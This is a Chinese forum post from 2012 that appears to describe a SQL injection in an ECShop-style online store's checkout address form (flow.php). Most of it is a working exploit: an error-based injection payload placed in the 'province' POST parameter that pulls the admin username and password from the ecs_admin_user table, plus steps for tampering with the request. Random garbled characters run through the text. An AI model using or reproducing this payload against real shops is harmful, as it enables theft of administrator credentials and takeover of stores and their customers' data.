感谢欠杀的黑盒
, v7 D1 B" P8 y! L3 y8 p
+ D" ^! E4 [0 q9 `" d; l . p2 p. W. _! M
把任意商品加入购物车在填写配送地址那一页,有地区选择0 U+ l7 B0 _) C [( y5 m
( l2 N2 V# f- P( O6 rflow.php?step=consignee&direct_shopping=17 r; N) V9 r6 a: T% A3 r; _
比如省选择安徽( X% f/ |: W) w2 R2 O# W
4 H* w! m" R! _0 C& [
其中POST数据如下5 o- ?$ Q6 E; f7 X% ]) ]
: M& g9 Y9 b+ N6 U% {7 k/ ]country=1&province=3&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=checkout&address_id=province=3
. @2 M( {, C- m$ M6 \# E改成
1 U! I( _5 E! i+ ?) r" X ) {% P3 C% H4 r& Z. d- a4 l
province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #% N& X. H z) ]0 i* k
ps:详细的方法,用火狐tamper data插件……..即可改post内容….." n; X: Q+ T4 @8 @ T3 W
5 Y, A. e0 f9 N, P1 K先注册账户,随便选个商品进购物车,然后填地址,电话什么的,填好开始抓包,改包$ O- t0 b4 S }
2 Z% ~" e. w }
就会回显错误页面了。。。。
5 h$ `6 o1 f; C' z & ?' k4 F0 m" o! V: W
我自己没用这个日站过,就测试了一个最新版和老版本,均ok,所以写全版本,理论上应该是的
5 F7 S0 @) X4 |2 A( u" N; o) b4 X1 A |
发表于 2012-12-31 09:19:27
收藏
支持
反对